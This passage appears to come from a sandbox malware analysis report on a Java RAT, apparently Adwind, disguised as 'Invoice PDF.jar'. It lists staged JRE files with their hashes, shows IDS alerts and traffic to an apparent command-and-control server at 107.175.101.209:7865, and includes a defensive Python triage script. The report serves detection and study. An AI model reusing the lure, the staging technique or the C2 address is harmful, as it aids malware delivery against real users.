                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I...I...I..HI...I..JI...I..~I...I..GI...I...I..I...I...I..NI...I..II...IRich...I........PE..L.....\.................0...,.......1.......@....@.................................`.....@.................................dR..x....p...............`..x.......t....A...............................P..@............@..p............................text............0.................. ..`.rdata.......@.......4..............@..@.data........`.......N..............@....rsrc........p.......P..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):16248
Entropy (8bit):6.498340727085624
Encrypted:false
SSDEEP:384:GpsxHnDia9TejmSHhV8x5YeCuIj+I118JN77hhKU:GpsxHnVHS/8x5tCuIj+0S3hQU
MD5:BCEDCDCA329C4EB6CF10E970273345DE
SHA1:6CC296055F380BD44170A2D914BC110206B5412F
SHA-256:3D38B8588703546E791E5D05664187B2343700978EAEE65544F4982F43649416
SHA-512:BCA0C7BA0D84F0A21CBE2E9DA647A71AD559D4A7B47FD5B12AC3A68A859143BDEE3132F7582D180213CE7DACBF09296BC9C4F8AA79CFAA7FAE5E4714EFDCC215
Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L.....\..................................... ....@..........................`............@..................................#..P....@...............$..x....P....... ...............................!..@............ ...............................text............................... ..`.rdata..z.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B........................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):126840
Entropy (8bit):6.782112254586264
Encrypted:false
SSDEEP:3072:RSoAtOm8tlNOY4nnTdLC0/NZ3p71nyIn/8Nw9wrhSGR:RIOmVTdLL4CFOR
MD5:1988319262C8461C0D354D29B7164554
SHA1:1E68F3A3ABF49816380AB577FEADBE2B0F0BC3CF
SHA-256:5043B05638292F0563FD1F79181AECD275D450E5B040DE60CE3426092220B0C0
SHA-512:67677D6D7374FCC887A289653938EBFD1E209155D4671E8819D9CE76EE2E36A5A2CFF191DBAC5CF9C750F186141A5F0C336DFD34379361E06680F582D02FE0D5
Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3...3...3...(...4...(./.1...:...5...\./.0...:...2...(...4...3.......(...J...(...2...(...2...(...2...Rich3...................PE..L.....\...........!.................'.......0......................................Hm....@..........................u...B...U..........................x.......,....5...............................S..@............0......lU..@....................text............................... ..`.rdata.......0......."..............@..@.data...............................@....rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................
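Every file in this block is a stock Java Runtime Environment component (hprof.dll, instrument.dll, j2pkcs11.dll, java.dll, java.exe, and so on) that xcopy.exe wrote into C:\Users\user\AppData\Roaming\Oracle\bin, and every one is rated Malicious:false. That combination is the point worth keeping: the binaries themselves are clean, but a JRE being staged into a user-writable profile directory by a copy utility is consistent with the JAR bringing its own runtime so it can execute without a system-wide Java install. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses dropped-file records in the exact "Key:Value" layout shown above and flags that pattern, then emits the SHA-256 values for a hunt. The sample text embeds two records copied from this page (with the Preview line shortened); the PACKED_ENTROPY threshold and the USER_WRITABLE path pattern are assumptions of the example, not values from the report.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample: two records copied from the report above (hprof.dll and
# java.dll) in the report's own layout. Preview lines are shortened here.
SAMPLE_RECORDS = """\
C:\\Users\\user\\AppData\\Roaming\\Oracle\\bin\\hprof.dll
Process:C:\\Windows\\SysWOW64\\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):133496
Entropy (8bit):6.673761407092987
Encrypted:false
SSDEEP:3072:b0V2kbLSSaDdr8814VRGx+wEG4lgb371xiEvtmqdrkCB/jKChyNCY0:ibL9q4M11jKe+J0
MD5:560352A60930E13DCF009FDC21D285E9
SHA1:E3BEE840439183174FF4515817ED2D0C3298B9B4
SHA-256:C74610342A1DF8ED01DBFD9638E24B72B1942973C2EB844C7E0B92863AEAFAFC
Malicious:false
Preview: MZ......................@.......
C:\\Users\\user\\AppData\\Roaming\\Oracle\\bin\\java.dll
Process:C:\\Windows\\SysWOW64\\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):126840
Entropy (8bit):6.782112254586264
Encrypted:false
MD5:1988319262C8461C0D354D29B7164554
SHA1:1E68F3A3ABF49816380AB577FEADBE2B0F0BC3CF
SHA-256:5043B05638292F0563FD1F79181AECD275D450E5B040DE60CE3426092220B0C0
Malicious:false
Preview: MZ......................@.......
"""

# Field names the report uses; any other line is taken as the start of a new
# record (the dropped file's path, which itself contains a ':' after the drive).
FIELDS = {
    "Process", "File Type", "Category", "Size (bytes)", "Entropy (8bit)",
    "Encrypted", "SSDEEP", "MD5", "SHA1", "SHA-256", "SHA-512", "Malicious", "Preview",
}
# Assumed threshold: unpacked PE files usually sit well below this; higher
# values hint at packing or encryption.
PACKED_ENTROPY = 7.2
# Assumed pattern for locations a standard user can write to without admin rights.
USER_WRITABLE = re.compile(r"\\AppData\\(Roaming|Local|LocalLow)\\|\\Users\\Public\\|\\Temp\\", re.I)


def parse_dropped_files(text: str) -> List[Dict[str, str]]:
    """Turn the report's dropped-file listing into one dict per file."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if sep and key in FIELDS:
            if not current:
                raise ValueError(f"field {key!r} appears before any file path")
            current[key] = value.strip()
        else:
            current = {"path": line}
            records.append(current)
    return records


@dataclass
class Finding:
    path: str
    sha256: str
    reasons: List[str] = field(default_factory=list)


def triage(records: List[Dict[str, str]]) -> List[Finding]:
    """Flag executables staged into user-writable paths by a copy utility."""
    findings: List[Finding] = []
    for rec in records:
        reasons: List[str] = []
        path = rec["path"]
        is_pe = rec.get("File Type", "").startswith("PE32")
        dropper = rec.get("Process", "").rsplit("\\", 1)[-1].lower()
        entropy = float(rec.get("Entropy (8bit)", "0") or 0)
        if is_pe and USER_WRITABLE.search(path):
            reasons.append("executable written to a user-writable directory")
        if dropper == "xcopy.exe":
            reasons.append("staged with xcopy.exe rather than an installer")
        if entropy >= PACKED_ENTROPY:
            reasons.append(f"entropy {entropy:.2f} suggests packing or encryption")
        # A clean verdict on a file that still trips the rules is the tell-tale
        # of a legitimate runtime being dropped where it does not belong.
        if reasons and rec.get("Malicious", "").lower() == "false":
            reasons.append("AV-clean: likely a legitimate binary in an illegitimate location")
        if reasons:
            findings.append(Finding(path, rec.get("SHA-256", ""), reasons))
    return findings


def hunt_hashes(findings: List[Finding]) -> List[str]:
    """Sorted SHA-256 list for an EDR or file-inventory search."""
    return sorted({f.sha256 for f in findings if f.sha256})


if __name__ == "__main__":
    for f in triage(parse_dropped_files(SAMPLE_RECORDS)):
        print(f.path)
        for r in f.reasons:
            print("  -", r)
```

Run it against the whole dropped-files section of a report and the output is a per-file reason list plus a hash list; the hashes are useful for confirming the staged copies are byte-identical to a known JRE release, the paths and the xcopy.exe parent are what a detection rule should key on, since the hashes will change with every Java version the operator bundles.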
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\java.exe
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):192376
                                                                                                                                                                                              Entropy (8bit):6.757249265537466
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:ZWos+tGEkBbq6D3BdsdRM5xzgglg8S7UnatoTBf3bmjZqMNT2rIWD2:lspTq6Ndsvezdlg8S7watoTB2vi92
                                                                                                                                                                                              MD5:28733BA8C383E865338638DF5196E6FE
                                                                                                                                                                                              SHA1:F3FA35DB0FF65B94E18D0B556A691853BDE0F692
                                                                                                                                                                                              SHA-256:E58109151395D6E8668A750C5D107FC691C7C9D5E488486869AF2A1876B1504A
                                                                                                                                                                                              SHA-512:B6808381E74CBA7501D86D075A84989A8147479DF181EBF87BC0BD275EDCCE28FBC7AE90354E280D201AE6D5F97324A080222CC851C1C45A8DFEA71BA3097FC2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+H..E...E...E.L.....E..E....E..E....E......E...D...E..E..{.E..E....E..E....E.Rich..E.........PE..L.....\.....................&......7.............@..........................0............@.................................L*..d.......................x.......$....................................#..@............................................text............................... ..`.rdata...s.......t..................@..@.data....4...@......."..............@....rsrc................8..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):24440
                                                                                                                                                                                              Entropy (8bit):6.615275730279901
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:xx8xsGjyS/uj1ZrEZBrmnXWftpnPV5mzoqj++UJn8JN77hhDyB:YuSGj1w6O7ndEoqj++UJs3hxK
                                                                                                                                                                                              MD5:F9550DA74A8D197A3DD25C72402E78A5
                                                                                                                                                                                              SHA1:958163C425A227A146E85D1BF8636042944B7C9C
                                                                                                                                                                                              SHA-256:8AC7DA134900362253EBAD2C5C14D69D4DE012BC9ED3F07D04DF333E138439F5
                                                                                                                                                                                              SHA-512:F9A6E5884E7305AF4AB2942A7AF1617B8AC43FEB3267832FBF063C4EE9E903C001AC6606D8EEEDB50DFF87257807007B67C5B9BC7A87CBCE250052F4EEC75FC1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2..v...v...v.....+.t...m'$.u...v...\...m'&.w...m'..t...m'..{...m'#.w...m'".w...m'%.w...Richv...................PE..L.....\...........!.....*...........4.......@.......................................v....@..........................I..|....E..<....`...............D..x....p.......@...............................D..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...(....P.......:..............@....rsrc........`.......<..............@..@.reloc..^....p.......@..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):162816
                                                                                                                                                                                              Entropy (8bit):6.478081267870417
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:c82bFfGMMHcwDKadNV8zQLnjZqMNE+BP:cRttMHc2KadPZvj
                                                                                                                                                                                              MD5:23D4CE9539D97E3A82B26F64AFE51934
                                                                                                                                                                                              SHA1:6DE0D6B53CE0658108A8A7BADFA3D0803B276E0B
                                                                                                                                                                                              SHA-256:BDE45AC8606CE62AA0F7A8DC8EC6DA591664FB37B4A4B883E1792F8B564187B4
                                                                                                                                                                                              SHA-512:54CF98D3F53E4259574169F110521655D9E1ED8F1F18C77D6842175F88A213BBDD4AD56A6D55D68E685E25D9742532F2C49E5834756BB9FC2D4BED3432BF58FA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d2.. S.. S.. S..;.;.9S..;....S..)+6.)S.. S...S..O%..(S..;....S..;.>.!S..;.?.!S..;.8.!S..Rich S..........................PE..L...?.\...........!.....v... .......w....................................................@.............................Z.......d.... ..........................l...`...................................@............................................text...@u.......v.................. ..`.rdata...L.......N...z..............@..@.data...l3..........................@....rsrc........ ......................@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):74616
                                                                                                                                                                                              Entropy (8bit):6.341209283577633
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:SgmG2haDkdWIJ7OkUVq7qjh3rmKPNdTB63hvc:ZE+bgOkINjZqMNdl2c
                                                                                                                                                                                              MD5:3FAC97B1ED8915100DF8EE90AE06D890
                                                                                                                                                                                              SHA1:8F667F8427739A8DAD4E389A48CB0DE173B80171
                                                                                                                                                                                              SHA-256:40BAB5330D940D10090C1023B89CF5825906FB64DF719A25A970D681B6AED676
                                                                                                                                                                                              SHA-512:EDDB42AC47002960FBE805EF5503456815F6D4FCA1C49DD73D05095D23B92FCC0B42C166067D9029AD77B56A6E95B2AB9C678A656ADDCB5D104FA6708C5D9F5C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]._...1...1...1..8....1.....1..8....1..8....1......1...0...1.v....1..8....1..8....1..8....1.Rich..1.........PE..L...W.\.................F..........:G.......`....@..........................@............@.................................P...x.......................x....0..4...0b..............................0|..@............`...............................text....D.......F.................. ..`.rdata.../...`...0...J..............@..@.data................z..............@....rsrc................|..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):58744
                                                                                                                                                                                              Entropy (8bit):6.606153663376911
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:wiEA4Ynzgz8R2tRsC7RH5UfJTT8Om6YxJou53h628:wi0QR2tN7AfF8d6Y8ua28
                                                                                                                                                                                              MD5:B5C38AA2C91CAACCC19233B5B7837C6F
                                                                                                                                                                                              SHA1:5B9D8BC150CDDA3DCB555DC06D4B13D6FFA7F143
                                                                                                                                                                                              SHA-256:B21D8168D28F8C5D2A5D98F56A2A3D0327331E2C2602A58A8538A0CD2CD2FD46
                                                                                                                                                                                              SHA-512:2795927F40ACC03910F025860E91B3F5FDED1B7E601BD4B4A50EBE6264DDFAE06575CDBA6350C18EB6681015F1634FEE948B9627FA004D431EFD8AABD0ACEFB7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................Q........+......Q.......Q.......Q..............................h.......h.......h.......h.......h.......Rich............PE..L......\...........!.....p...\.......s...............................................G....@............................x...h...........................x.......X.......................................@...............@............................text....n.......p.................. ..`.rdata...E.......F...t..............@..@.data...............................@....rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):469880
                                                                                                                                                                                              Entropy (8bit):6.604403913705833
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:p3kxh6DqypODvUXai0jdbdRCqBjA7dB1stHs1ngVc/T6yF9HvofFGMReiDR8R/bq:2A26uhi4dbdRCqC7duanV/bPodGS2e9X
                                                                                                                                                                                              MD5:0D6DF3B9A303E92B798F977890E1895A
                                                                                                                                                                                              SHA1:1207E665BBE6E308757B042F415C59FEE5B3D414
                                                                                                                                                                                              SHA-256:05EC925EEDAA7C3E69AD0EA98ECF4D43CE14377B8786F6C5AEC722FBABB443A4
                                                                                                                                                                                              SHA-512:0747EBF613E282CE996EBD0BEC42BDDAF6747E340FF86EDE85068F6867559DD94170A061D2FBE41051AF04E919A511FA9D1F21048B89511C8976598CE51C9DE1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.H.#.&.#.&.#.&.*../.&...'.!.&....'.&...%.&.&...#.6.&...".(.&.P.'.$.&.#.'.q.&..."...&...#.x.&...&.".&....".&...$.".&.Rich#.&.................PE..L......\...........!................}........0...............................P............@......................... ...................................x.... ..\&......................................@............0..H............................text............................... ..`.rdata......0......................@..@.data...............................@....rsrc...............................@..@.reloc..\&... ...(..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):138616
                                                                                                                                                                                              Entropy (8bit):6.577168169432668
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:tA5ee6KcqOOWm96dhkO8LuuKBnVrp4gutFHNsB:tA5AK7OQQfkVLuuurOtFuB
                                                                                                                                                                                              MD5:6C5EE1974EBA4858EE1021A9121F16A6
                                                                                                                                                                                              SHA1:1C17AF0F40767480C2334D94425E37F76D4CCDDD
                                                                                                                                                                                              SHA-256:559C5D9F513503158380E1D34B41659C4D0DEE3CCBD08CEF653964CD18A54B19
                                                                                                                                                                                              SHA-512:A9E8A0E6EF34717290CC1321FC5002CA3F8DB5FF8B4BE4A5BF96C82DB5DAC546E398FBBACB916D05290DDDF9058DE3937E04F9DA7D5EF3A8E46FC0AD877105A3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.E.=.+L=.+L=.+L4..L7.+L.*M?.+LN.*M>.+L=.*L..+L.(M<.+L..M6.+L./M6.+L./M..+L.+M<.+L..L<.+L.)M<.+LRich=.+L........PE..L......\...........!.........D......m........................................@...........@.........................0.......,........ ..................x....0..........................................@............................................text.............................. ..`.rdata...2.......4..................@..@.data...............................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):192376
Entropy (8bit):6.761593244493689
Encrypted:false
SSDEEP:3072:p0o+iwdnP6ngIsIC18pVwUM0NldXnSsohU4TBfHqKjZqMN6wVzQQY:p0eg6ZsICYwUJzdXnSpU4TBdvD2QY
MD5:4BFEB2F64685DA09DEBB95FB981D4F65
SHA1:CD4007094CD1D9792CEDBE699502FB15D9BD370A
SHA-256:A181BEFBC33B658305498CDAFF3EDA6512701003BF7144C8E95E953D2638A933
SHA-512:A41BB47CF769BA474B4B43B4BC312E8C542922AFF5913AD10DF02F2C834B7E7C349767A420311A92FF1A8721C62176CE5CA879847C3DB5DC789129F7611AFA56
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v...%...%...%..w%...%.7D%...%.7q%...%..|%...%...%...%.7E%*..%.7u%...%.7r%...%Rich...%........................PE..L.....\.....................&......V.............@..........................0............@.................................L*..d.......................x.......$....................................$..@............................................text............................... ..`.rdata...s.......t..................@..@.data....4...@......."..............@....rsrc................8..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):300408
Entropy (8bit):6.458865739115016
Encrypted:false
SSDEEP:6144:a29mYzedYNAMeo/0/3/A//FE/FzdXoktv/PE:hFCmNAMeo/0/OtE/F1tvk
MD5:F64595565AB90F21992D5964BE538A1B
SHA1:DBBC1CCBCAE1EFCA698B9B1A38D9413A0C655F1C
SHA-256:6E38C8F64E2EEA1454A69921083602B18EDE7BE0FB44816D9FD90C4409E3AE52
SHA-512:ADED74B21D8803FB4693DB2229CE2CAB0B5E2D01A387DE605235A82DA641C6CC51ECF575958CBD9EEB6CEC8715CBDFD5C1C882A130AC5059888C3310E57FCC1D
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,.o...o...o....[..o....n..o....V..o...o...o....o..o....n..o...._..o....X..o..Rich.o..........PE..L.....\............................^k............@..................................Y....@.................................pJ..x....P...............z..x........"...................................5..@....................F.......................text............................... ..`.rdata...x.......z..................@..@.data........`.......J..............@....rsrc........P......................@..@.reloc.../.......0...J..............@..B........................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):14712
Entropy (8bit):6.303771574688693
Encrypted:false
SSDEEP:192:abn4VZqXr5Yc3XLPVlD6tR4MbL1tJx+w0fH0JOqsmVgz28WhBqoB:auWNb7PVlmNj+V8JN77hhVB
MD5:DC9B3CC131B7CDB14BAA0B6CCCAFFB1F
SHA1:D55A1D7DB43B95475EA48D1C68E4BD38EF2CB2BB
SHA-256:50E59D9C8F497A4D68B181F408747BBF32E84DFFBB2FD78F954495B584FFCD3A
SHA-512:C2A1A1A052BA6F025D0D704C97E2CAED2BC3B2C72D1474CB62A3F7EE8D4A09F4FC32B6214D86977473B347332E9A1AFF121A359A88A7F20F5E602C4B3091F483
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X"._9LR_9LR_9LRD..R^9LRD..RS9LRD..RZ9LRVA.R]9LR_9MR|9LRD..R\9LRD..R^9LRD..R^9LRD..R^9LRRich_9LR........PE..L.....\...........!......................... ...............................`............@..........................&..J...\"..P....@..................x....P..@.... ...............................!..@............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...`....0......................@....rsrc........@......................@..@.reloc..t....P......................@..B................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):165752
Entropy (8bit):6.723497100208418
Encrypted:false
SSDEEP:3072:Gc5WVPoRd/N1841YIzfmt6YY7jkmzGBkeUiuXb89Dhg3hL1m:ioD/N1RfDFnhe1pDm3nm
MD5:478CB1C0BF491026C012782BEDCBFBA7
SHA1:98E46DA57BF33874FB5E24DE9ED309F430145C96
SHA-256:0BC86567EF9D466E367A0B8DF633108CE2785487ECA84D073A3DA491153A6CFB
SHA-512:DAB2E9BDAD513A0E548E1BA7C622807F29DFE0F663DA6823E61844BB1FE9BF969BA7903E882708A675D8693FF8D73B6B5274352221072FA3473F65E0C30F0894
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#..cp..cp..cp...p..cp...p..cp.D.p..cp..bp..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cpRich..cp........................PE..L.....\...........!......................................................................@..........................O..h...,J..<....p...............l..x........)..@................................H..@...............,............................text...h........................... ..`.rdata..8`.......b..................@..@.data...0....`.......8..............@....rsrc........p.......<..............@..@.reloc..B+.......,...@..............@..B........................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.990033848936036
TrID:
• Java Archive (13504/1) 62.80%
• ZIP compressed archive (8000/1) 37.20%
File name:Invoice PDF.jar
File size:658679
MD5:903b63e35bf8738809eab0f187027daf
SHA1:257ff2ca9d7848e7c411790c3fa88a0aea479079
SHA256:bdfe705deebedf2b4edd1fee5bb225f3a14718f0a1007553fec5050db0f7fe08
SHA512:2c2145d002020579a5717ab480d0689a71428fe69366de525d68da28c048fc7bbc6068608113756c55164932edaf8700118e9a6c8158c3902b7a0a20f0a03638
SSDEEP:12288:ivKyI6KN6nZsWz9vzuEvQL4J5QkJKHxM4B/7Ztjk8BePEYXT:ly3KUnWK9v65e5QwKHxBB9tjJedXT
File Content Preview:PK........wJ.R...b..........$.lxrqyapglo/resources/ljtemfaohk.. ...........5.75...]..75...]..75.......:r-x.~..}s.8.9....p..O...%BEp..p...P.E..KbI.;..'...n{&.bfv.W.J....+.J$x.......e...........f:_....?...........{.?.....=........i.........~....T......../..

File Icon

Icon Hash:d28c8e8ea2868ad6

Network Behavior

Snort IDS Alerts

Timestamp                | Protocol | SID     | Message                                                    | Source Port | Dest Port | Source IP       | Dest IP
04/19/21-23:32:52.341651 | ICMP     | 384     | ICMP PING                                                  |             |           | 192.168.2.6     | 93.184.221.240
04/19/21-23:32:52.376656 | ICMP     | 449     | ICMP Time-To-Live Exceeded in Transit                      |             |           | 84.17.52.126    | 192.168.2.6
04/19/21-23:32:52.377227 | ICMP     | 384     | ICMP PING                                                  |             |           | 192.168.2.6     | 93.184.221.240
04/19/21-23:32:52.412491 | ICMP     | 449     | ICMP Time-To-Live Exceeded in Transit                      |             |           | 5.56.20.161     | 192.168.2.6
04/19/21-23:32:52.412799 | ICMP     | 384     | ICMP PING                                                  |             |           | 192.168.2.6     | 93.184.221.240
04/19/21-23:32:52.454981 | ICMP     | 449     | ICMP Time-To-Live Exceeded in Transit                      |             |           | 81.95.15.57     | 192.168.2.6
04/19/21-23:32:52.455423 | ICMP     | 384     | ICMP PING                                                  |             |           | 192.168.2.6     | 93.184.221.240
04/19/21-23:32:52.496777 | ICMP     | 449     | ICMP Time-To-Live Exceeded in Transit                      |             |           | 152.195.101.202 | 192.168.2.6
04/19/21-23:32:52.497122 | ICMP     | 384     | ICMP PING                                                  |             |           | 192.168.2.6     | 93.184.221.240
04/19/21-23:32:52.547701 | ICMP     | 449     | ICMP Time-To-Live Exceeded in Transit                      |             |           | 152.195.101.129 | 192.168.2.6
04/19/21-23:32:52.548930 | ICMP     | 384     | ICMP PING                                                  |             |           | 192.168.2.6     | 93.184.221.240
04/19/21-23:32:52.589492 | ICMP     | 408     | ICMP Echo Reply                                            |             |           | 93.184.221.240  | 192.168.2.6
04/19/21-23:33:40.478077 | TCP      | 2020728 | ET TROJAN Possible Adwind/jSocket SSL Cert (assylias.Inc)  | 7865        | 49739     | 107.175.101.209 | 192.168.2.6

Network Port Distribution

TCP Packets

Timestamp                          | Source Port | Dest Port | Source IP       | Dest IP
Apr 19, 2021 23:33:39.848345995 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:39.985748053 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:39.985866070 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.336231947 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.478046894 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:40.478076935 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:40.478193045 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.510803938 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:40.510826111 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:40.512994051 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.548417091 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.568782091 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.573935986 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.705883026 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:40.713538885 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:40.713563919 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:40.713646889 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.716669083 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.855267048 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:40.860838890 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.861615896 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.862241983 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
